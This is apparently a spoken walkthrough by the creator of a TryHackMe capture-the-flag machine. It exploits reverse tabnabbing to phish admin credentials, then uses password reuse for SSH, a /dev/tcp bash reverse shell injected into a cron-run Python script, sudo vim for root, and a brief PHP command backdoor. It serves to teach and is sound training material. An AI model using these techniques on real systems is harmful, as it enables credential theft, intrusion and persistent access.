Hello YouTube, this is Ready Set Exploit, and we're going to be doing napping from TryHackMe, which is a machine I created which covers the tab nabbing exploitation. Essentially what tab nabbing is you click on a link that on any page that opens up a new tab. That particular link, the source code, has a target.blank, which allows for the new tab to be opened. However, if you have a particular JavaScript payload on the new page that you're going to, it can redirect the older page to a page of your choosing from the page that they're clicking into. So we use that to grab some admin credentials, which also happen to be the SSH credentials for the user Daniel. And then we see that Daniel is part of the administrators group, which allows us to edit a script, a Python script that Adrian is running, which is the other user. And then Adrian can use vim as sudo, which that is a simple exploit which we'll cover in two different ways. So we'll go ahead and get started. And first thing I'm going to do is I have a folder called napping. You could probably see I already ran Nmap. Make this a little bit bigger. And we're going to do sudo nmap-b for verbose output-sb to enumerate versions-sc to run default scripts-on to save it to a file called nmap.txt, the IP address of the machine, and -p- to enumerate all ports. Now this did take a little bit of time to run. I already ran it, and we only have two ports open. It's open 22 running SSH, telling us it's an Ubuntu machine, and we have port 80, which is running Apache HTTPD. We are given a PHP session ID. It's empty. So which standard web server and an SSH server. We can't do much with SSH, so let's go ahead and take a look at the site. So open up my browser, and we have a login page and username and password. We could try easy credentials like admin, see if that gets us anywhere. It doesn't here. I won't waste much of your time. We can sign up. So maybe if we sign up and there's some sort of admin, we can try to take over in some way. But the next thing I'm going to do is Alt-Shift-S, call this Gobuster. I'm going to run Gobuster in the background, save the IP address, and do Gobuster dir mode. It's a page. We're going to do extensions. We see that this is running, let's see, index. Can we do index.html? Nope. PHP. There we go. So also if we highlight over the link, we see register.php. We can look at the source. Same thing. I always like to look at the source first to see if there's anything that stands out. In this case, there isn't. So in this case, let's go ahead and do PHP, and we can look at any text files if there's any exposed, but not in this case. So we're going to use our payload, which is we're going to use the seclist payload, seclist directories, no, discovery, web content, directories, medium, and then we're gonna call it dirt.80.txt, and whoops, no one saw that, right? There we go. So while that runs, we find a register page, index page. So while this runs in the background, let's sign up. I don't know, we'll call ourselves test user, password. Submit. Looks like it went through. Test user, password. And hello test user, welcome to our free blog promotion site. Please submit your link so that we can get started. All links will be reviewed by our admin who also built this site. So we know there's an admin, and we know the admin built this site. Put a link here, submit it, and it is totally free. We can reset our password, sign out. Okay, so we look at the cookies. We're given a standard PHP session ID cookie. Not much we can do with that there. Back at our Gobuster, or just Gobuster. Let's call it Go. There you go. And we do have an admin directory here. Okay, and I see that it exposes the page before we can look at it. So that's a quick win with vulnerability if you've never seen it. But then see here, it's supposed to say size 0, size 1. Probably seems like it does something. So we can check that out. Click here, click on this link. Okay. Oh, you know what? I'm just gonna do that. Copy selection. And let's see, we go, it says forbidden, right? Let's turn on burp. It's a little unrelated, but I just want to see if my own page, because I'm such a terrible PHP coder, if I actually expose something without meaning to. So let's go ahead and capture it. Actually, let's make this bigger so we can see. So user, display, and I'll make it 15. That's good. So here, I'm gonna go to options, intercept server responses. Yep. Let's load up the page, admin, and forbidden. Okay, I thought it would expose something. It doesn't. I guess this is the response, so I just misread that. Config page actually is size 1. So let's look at that. Config.php. Sure that's on. And nope, I lied. Okay, so it's good. I know how to make it more or less secure. But let's go back to admin. Admin here, forbidden. We could end this. We're gonna run it again. Call this admin.text. And we're gonna do admin. We're gonna run it from here. And just because the directory is forbidden, it doesn't mean that the rest isn't. So we do have a login page. And there we go. We have a login page that we can use, so we can try some basic SQL injection. Nope. Nope. Okay. We could do admin. Nope. Admin password. Nope. So nothing there. And still on our page, so can't do much with this. We do have a welcome, but see, everything gets redirected to login, so we just gonna leave that there. Let's turn this off. Don't need burp anymore before I forget. Put that back to 11, and we are done. So we have an admin page. Let's put that in the background. We'll let this run. Control Shift P, Alt Shift S, and we're gonna do, I don't know, we're gonna call this server. Do netcat on 80, and let's submit a page. See what happens. And I have my IP address there at the top, 13.37.178. Submit it. We can click on the link here, and let's just wait for a connection back. Yeah, we're waiting on a connection back. Oh, let's make this bigger. There we go. So we do get a response. So we have a PHP cookie here. That's interesting. Connection, keep it live. Right here we have a user agent, and this is a very old version of Firefox, 47.0. How old is this? Firefox change log 47.0. This is from 2016. So for some reason, whoever's clicking on the link is using a super old, 6-year-old version of Firefox. And you know, that could point us in the right direction. We know that the browser is old. So we know that the browser is has to be vulnerable, very vulnerable. It's not up to date. So something to keep in mind. So two things. Let's see what happens if we change the cookie. I don't know, resend, and we get locked out. Okay, so we can't do anything. What if we do this. Nope, doesn't work. So can't do that. So let's log in again. Okay, so what can we do from here? Let's put our link again, 13.178, and we see this link here. We can click on it, control U to view the source. So it's too small. There you go. So thank you for your submission. You entered this link, and we have target blank. So a good way to know what to do next is to remember what we are doing, what we're controlling. In this case, user input. Whenever there's input, that's where we want to focus on. In this case, our input is the blog link, and then it gets displayed here. So in this case, we have here, and then we have target blank. So we can start Googling from here. So we know it's an old browser. So let's see what happens if we take this, because I'm taking this from the perspective of you never seen this before, right? So let's look at, I don't know, exploit. And we get a couple hits. See, target blank, the most underestimated vulnerability ever. Okay, so we have a couple of hits. So let's look at this page. It's a phishing page. Medium by Alex. This was from 2016. So this fits, right? How was that? Firefox change log. And if we go down, I don't feel like doing, there we go, 7.0 June. So this version was in June 7th. Okay, so we got a little bit after this post. So we can just, even if you're not sure on the dates, it's a good chance that Firefox may have been vulnerable to this. But I guess so we're on the right path over here. So this is called, so what's this? Using target blank, links have no idea about this. So the page we're linking to gains partial access to the source page via the window opener object. So see, we have a payload here, but what is this called? Does it say the name? Google doesn't seem to care. Not getting a name. What's this? Okay, so we have this link. We'll go back here. How to fix the vulnerability. Okay, there we go. Let's look at this one from April 28, 2021. So target blank vulnerability, applications, because here, so where am I looking at? So okay, there we go. So this is called reverse tab nabbing. So that's what I wanted to find. So we'll close this, and what's this? Let's Google this. What's reverse tab nabbing? So we have a page here from Hacktricks. It's a good one. This one's good too, from HackerOne. I think this is the page. If not, is the other one. So essentially what tab nabbing is when you click on the link that doesn't have the rel opener, that doesn't have that, it only has target blank, you go to the new tab, and then the original page gets redirected to the link that's on here, the window opener location. So whatever link this is, that's where it'll go. Okay, and it'll take you to whatever you created. So, and let's see, is this on here? Is that the one I first clicked? Let's see. Yeah? Yeah? Copy, download, okay. I know HackerOne has that, but we can use this. I wonder if I can copy this whole thing. No, HackerOne sometimes is, so let's see. Exploit, we could look at HackerOne. Tab Nabbing, GitLab.com. So see, this is a lot of, you see a lot of vulnerabilities here. But anyway, so we'll focus on this. So let's see if we can copy this all at once. So actually, before we do that, so it tells us right here, this is vulnerable HTML. This has a no opener, the rel opener. So this one, whether you have this or you don't, it's still vulnerable. We can test this out. So we know the admin builds this page, right? And we know based on our findings, I lost the admin page. We can start putting two and two together. We know there's a login PHP, and we know the admin built this site. So there's a good chance he built everything. He built the whole site, right? And this looks just like the first one, except admin login. So we can assume that he's checking, he or she, the admin, is checking the links, logs in and checks any links that are on here, right? If we look back to our Go, there is a welcome page, and let's stop this now. So it's probably checking the links. They're probably checking the links here, right, on the welcome page. So we can only assume, because they built this page, that the welcome page has the same vulnerability. So if we can trick the admin into thinking they logged out and they'll put their credentials back in, then we can get those credentials if the site they're putting those credentials is ours. So let's go and do this. So let's see if I can copy this whole thing. Come on. It's a copy button here. See if that works. So let's call this, I don't know, index. So vi index HTML. Actually, no. We'll call it blog HTML. There we go. Oh, great. Copied it. So we're going to point this to index.html. 10.10, no, 13.37.178, right? I like this. And then we can do totally a safe site. There you go. I don't know. That's my IP address, yeah. And now, index, actually we'll call this one blog. And actually, I just realized what I did. We can't use the same port on both. We're gonna use port 8000. Right, and this is where blog will be hosted. And now here is gonna be index. I'm gonna call this index.html. So what we're gonna do is call this, I don't know, this could be like, oh, our index, what's gonna be? So this is login PHP. So actually, let's call this login. That makes more sense. And how can we trick the admin? Copy the login page, pretty easy, right? There we go. And this one is gonna run on port 8000. I think it runs on 8000 by default. There we go. And that's gonna run on 80. Yeah. So what do we do now? Well, let's test it out. HTTP 10.37. Oh, God, I keep doing it. 13.37.178. blog.html. Submit it. And I want to highlight this, copy, and put it again. And if we look at blog, we just have to wait. Now, little spoiler, it runs every minute. And every 5 minutes, all the links get cleared. Why? In case somebody was really trying to figure this out and messing with different URLs, and they just put some bunch of junk, like I did. The script, it could throw off the script, the connection, and it may not get to any URLs below it. I did that to testing, and so every 5 minutes it clears all the links to avoid this error, because I didn't want anyone just waiting forever thinking they did something wrong, have to restart the whole machine, so that's why I did it. Now if you see that it's been more than 1 minute, maybe you submitted during that 5-minute mark and it got cleared. It happens. So you just kind of have to be patient. And what's going to happen is you're going to get a hit here, and then you're going to get a hit here. So there we go. We got a hit. We got blog, and if we did it right, we get a getIndex.html, and of course we do get a hit. But what did I do? I boofed it because I didn't change here. But we know that this is the path we want to take. So we're going to do this, and we're going to do that. And now we're going to do Wireshark. And I don't know what, there's two. I haven't looked into it, but I know it doesn't for some reason work with this one. It works with the capital W. I don't know why. Maybe it does, maybe I just did something. So we're going to do ton 0. And actually, let's make this bigger. This is way too small. Okay, and ton 0. And now we're listening. We're going to listen to HTTP only. So let's just keep submitting this link. Copy link. Submit it again. And we're going to wait. And there we go. Oh, that's my VPN. Woo-hoo. And we got a hit. And we get a post here. If we go here, or so we got a hit on our block twice. And we got a get and a post. A get and a post. So if we look at our browser, we have quite a bit of responses. We're going to right click, follow, TCP stream. Okay, and there we go. We have post welcome. So that's us. That's what we did. Let's keep moving. There we go. So it gets the blog. Okay, and PHP. Okay, we knew that, and so it sees this, and it loads up this admin page, and there we go. It posts the credentials, and we have the username Daniel, and this call me napping 123. This looks URL encoded, so we can URL decoder. Could be any of them. We have call me napping 123. So let's end this. So we got 4 hits, so it's actually going to clear. It'll clear the link after this. So Control-Shift-T, call this SSH bi creds, call me napping, and Daniel. And now we can SSH to Daniel at 10.10.112.175. Yes. Password. I hope I copied it. And we have access. And that's it. There's nothing on this page. But there we go. So that was the Tab Nabbing attack. So again, it really originated from, if we look at the source, from just Googling this. Again, we think about what we have, what the input that we're putting in. What can we control? Never trust user input. So we have here, and then it would lead us to a couple of pages. And this one actually gives us a name, reverse tab nabbing, which is here. And then Googling that eventually led us to this hack tricks page, which basically told us what to do. Okay, so, and we got creds. Now, I won't go through it. I don't want to waste too much of your time. But if you try that on the main user login page, it won't work. Okay, and I'll cover that why later. Okay, it only works when you copy the admin login page, because that's what we're trying to get anyway. So, let's see. So that's that. Clear that. Actually, let's try our credentials here. It's probably going to be empty. Yep, submitted links is nothing. I don't know. Submit it again. Oh, I got logged out. Why? Because I logged in as the other user. I didn't set the sessions to be separated, but whatever. I don't know. HTTP 10.13.37.178 blog.html, and yeah, that's it. Do I still have the password? I think if I do this, I'm gonna get redirected. Yep. Daniel, login, and there we go. See, we have Daniel's page, and we see there's links, and if we click view the source, we see there is a target blank. And actually, if we go back to blog and we go here, so most browsers, all modern browsers, have this patched, right? So if I click on it, you see I didn't get redirected. Totally a safe site. So I was able to get this to work a few months back by going, I think, directly here. It wasn't working anymore. Let me actually run this again. 8000 login.html. See, that's our fake login page, looks just like it. So I was able to get this to work a few times. See, when I will go to this page first, and then clicking on the link actually redirected my original tab. Doesn't work anymore, and I guess because my browser is patched. So, and I could go and uninstall an old version of Firefox, but the point was to just show how this was vulnerable. It could still be vulnerable if somebody hasn't updated their browser in forever. So, again, just updating things. And of course, the next big lesson is just password reuse. If Daniel used a different password for SSH and the admin page, we wouldn't have been able to do anything, because all that admin page did was just check links. So anyway, from here we can do some basic. We could run something like limpies, but we could do basic recon. We could look at like find. I always like to look at SUID binaries, set UID binaries, type. Actually, I could have started with type, but permission, user has set UID binary, type F dash. Did I make this bigger already? I did. Actually, let's see. Yeah, okay. So to go into dev.null, and we got a couple of hits, but there's nothing here. All pretty standard, right? So still going. Have this. A lot of times you find some set UID binaries that are vulnerable, but in this case they're all fine. So do we have sudo -l? I think it's called me napping 123. Okay, Control Shift T. Cat creds. Yeah. Oh, okay. So, yep, can't run sudo. Why? Because if we look at our groups, we're not part of the sudo group, or we just can't run anything on sudo for Daniel. So, another thing is we are part of the administrators group, which is unique. You don't always see that. That's not a standard group in Linux. So, another basic thing we can do is find any file, type F for file, for group administrator, and any errors go to dev.null, any standard errors go to dev.null, and we do have a hit on another user, Adrian. So if we look at this file, we see Adrian has read-write access, and the administrator group has read-write access. So let's go to that directory, clear this. So if I've done the same command but done group or use the user Daniel, we would have found nothing, just a bunch of noise. So anyway, call this SS. Oh, we're still on SSH. I thought I was on this other tab. So anyway, so let's see, ls, and as you could see, we have 3 files: user.txt, which we can't read, only root can read write, and Adrian can read. We have site status and query. So let's look at query, since we can read write, and we have from datetime import requests. So looks like it's getting, it's checking on localhost, and if you get a 200 okay, it says site is up. It's writing into this file, which we have. Otherwise, check out site. That means something's wrong, right? Like, why are we not getting a 200? And okay, so we see that site's up and it's running every minute. Okay, so what can we do here? Pretty simple. Since we are part of the administrator group and we have read-write access, so this is the creator, groups, everybody else, right? So only everybody else can read, but we can read and write. So first thing I'm going to do is let's call this netcat, and we're gonna, we're gonna call this shell.sh, and we're gonna do bash dash c bash dash I dev.tcp.10.13.37.178 9001, and then there we go. So standard, I think standard something redirect to 1, which is this, I don't know, OXDF, if you're familiar with him, he explains this bash reverse shell pretty well. But anyway, so let's cat this. I'm writing here just because it's just easier to deal with BI on my machine. So then we're gonna do bi dev.shm.shell.sh, copy that, which bash, and copy that, and now we're gonna just right here, so we're gonna do import OS. That's two, we can run system commands, and we could just write it right here. So we could do os.system comma bin bash, and I always like highlighting the full path, and we do dev shm.shell sh, and I don't have to make it executable in permissions because I'm using bash to run it. So I'm pretty sure. So let's see. So if we look at site status, it's gonna run next minute, and maybe I should have netcat running. So wait for that. This is pretty distracting. I'm gonna go ahead and minimize that. So just have to wait that minute, because what's gonna happen is every minute this this is being executed, and it is on Adrian's directory, which means that there we go, we got a shell. So like I was saying, it is on Adrian's directory, so we can only assume Adrian is executing it, right? We also could have run pspy and we could have found it out that way. Let's see, in case you weren't sure and you wanted to really make sure, server copy pspy here, python server, run our server there. Let's go to temp, and we're going to do wget 13.37.178 pspy64s. It's downloading it, and we're going to do chmod, actually I don't know, just bash pspy. It's not a binary. Oh, it's not a binary file. Duh. So there. PS. I mean, yeah, there we go. It's a binary file, so we can just bash it. So it's not a bash script. So there we go. So see, user bin Python. So we see that UID 1000 is executing it with Python 3. Okay, so there we go. We see this was done by user 1000. So cat etc passwd grep 1000. That is Adrian. See, that's the user ID of Adrian. So now that's how we know Adrian was executing the shell. So now we are the Adrian user Python that if we want to upgrade our shell, python-c import pty pty.spawn bin bash, right? And why do I want to do this? It's because I'm going to copy this. See, if I press up or down, I get those weird characters. So we can do a full TTY session or PTY session. There, work, Control C to background it, stty raw dash echo semicolon fg to bring that process back. Press enter twice, and now if I do ls, we have back on our site, and we can go up. Export term equals xterm, so that now I can do clear. So we have a reverse shell. We can do a couple of things. We have read-write access to this directory, and there is an SSH folder, and there's nothing here. So what else can we do? We can read the user file. Okay, so that's nice. We now can get that flag. And let's go into SSH. We have a reverse shell, but I always like to drop SSH keys, key generator FID, whenever I can. So do that, no passphrase. If we look again, we have two keys called ID RSA. You can call the keys anything you want. I could have called it Adrian. So we're gonna cat the pub file. I'm gonna write it into authorized keys. Won't work without it. And then we're gonna cat the private key. I'm gonna copy this and this. Control Shift T. SSH2 VI ID RSA. Copy the full key, chmod, give it the appropriate permissions, and then we're going to do Adrian at 10.10.112.175. Give it a second, and we're in as Adrian. So I have, not only do I have now two shells, but I have an SSH and a netcat shell, but I just prefer SSH sessions if possible. So where were we? Now, next thing to do, again, we can run limppiece or pspy, but quick check is to run sudo-l to see if there's any, which is what I did with Daniel user earlier. It wanted a password, but we couldn't do anything. But let's see if Adrian can do it. And we get a hit. We can run vim as root with no password. Okay, and that's a quick win. And I know that's pretty easy if you have done it before, if you're pretty familiar. And I know that, it seems like it got easier as the machine went along. I didn't want to keep, and I know that the tab nabbing can be a little tough if you never dealt with it before, but I wanted to, just go along with the theme of a box. And this was honestly the second box I ever created. So I was still trying things out, and this kind of fit the theme, because if we look at bar dub HTML, this is where the site is. You see, everything is on by root. So we only root, even the admin page, only root. See, we can't even go in the admin page. So only root can edit these files. So if you think about it, the whole theme is about admins, falling asleep on the job and not knowing proper configurations. Adrian and then you're both admins. Then you fell for the tab nabbing, a bad password reuse. Then you should always use different passwords. And Adrian gave the inappropriate permissions to script, to Daniel so that he could read write. Where if anything, to make it a little bit safer, it's just my opinion, maybe not giving Daniel access to read write that script. He should have Daniel just write its own script with any edits and then give it to Adrian to implement it, kind of like how GitLab works. You make changes and you push it, and then if it gets approved or do a pull request, if it gets approved, it merges into the main thing. I hope I explained it right. But there's two ways to do this. And then the last thing is Adrian gave himself a BIM access. And if we look at groups, he's part of the administrators group as well. Give him BIM access as root because Adrian thought, hey, I can only edit these files as root, so that's what I'm going to do. So there's two ways to do this. We could go to GTF bins. Right, it's a great site for shell escapes or just quick wins. Unix binaries that we could have used. There is one for BIM, and if we go down, there's one for sudo, where if you just run this, you could use Python and Lua. But if you run this, it's a quick win. It runs that binary and keeps those privileges. Right, so we could use this, but I want to show it the original way, at least the way I found it. So what was it? Sudo -l. So we're gonna run sudo vim, and if you look how it's being run, whenever we save a file, we want to do escape shift : or semicolon. You see the colon here at the bottom, and then you can do WQ to write quit, but in this case it's doing semicolon and bin bash. So what does that mean? That means if we do semicolon, we can run system commands. Who am I? Root. You see that right here? What else can we do? And we could just get a reverse shell. We could run that reverse shell we had earlier, or we could just simply do bin. I'm gonna do bin bash, not bin sh. Bin bash. Oh, I know why. Which bash. I mean, bin bash should have worked, but we'll go ahead and try that again. Bin bash. There we go. I probably mistypo something. Didn't see it. And there, if you see, we are the root user. Okay, so that's one way to do it. Can we exit? Enter. There we go. We also could have done bin. Oh, that's why. I probably didn't do this. Bin. No, we could have done. Let's just leave. There we go. We also could have done var dub. I wonder if this will work. I doubt it. HTML. I don't know. Index. Yeah. See, and we can do this, and we can escape from here. I wonder if we could do. And this is just more like playing around, maybe doing some, like, some backdooring persistence. So request RSE for ready set exploit, close brackets, and there we go. Nope, not in the code. There we go. So we could do that. And see if we go back to the page 10.10.112.175 and look at the source. There's nothing here. I wonder if we do login.php rsc equals who am I, and it didn't work. Definitely messed something up. Oh, wait. Okay, I know what happened. It's the index page. Aha! For where www data. So this is more for persistence because the web page is running as root. You know, I mean the web page is running as www data. That's how Apache runs it. But you know, so that's more like a backdoor kind of thing. But it's not a root backdoor. So what else can we do? We can, yeah. So let's actually delete that. Right. From here we could just do the same thing. Let's see, bin bash root. Okay, and then if we go to the root folder, we have the root text file. You know, I'm not going to show it, but there it is. And then we have, like I said, I have a couple of scripts. So when the machine boots up, I clear all users. When after 5 minutes, we do cron tab -l. You know, every 10 minutes I actually remove the site status. I didn't want the file to be too long for anybody that got stuck for a while. You know, this is me. You know, so every 10 minutes it raises and every minute it runs. What else? And then we have this, you know, at reboot, yeah, remove the site status, also at reboot, and at reboot delete the users. Every 5 minutes delete the links, and every minute run the nap script, which is just the tab nabbing. So that's the machine. That's the room machine. Hope you enjoyed it. You know, I had a lot of fun making it. The tab nabbing exploit was a pain to get constructing, get working, you know, and you know the first time around wasn't perfect, you know, so got feedback from this one user called Taquito that was able to help me out because you know he found that that tab nabbing exploit wasn't working if you change the quotes around. So you know, definitely had some help, and you know, creating rooms definitely a lot of fun, especially, and the experience with TryHackMe was a lot of fun, you know. So anybody that's thinking of making a room, I highly recommend it. It's a good learning experience from both a blue team and red team perspective. So anyway, I hope you enjoyed it, and you you know, feel free to subscribe, like the video, and enjoy the rest of your day.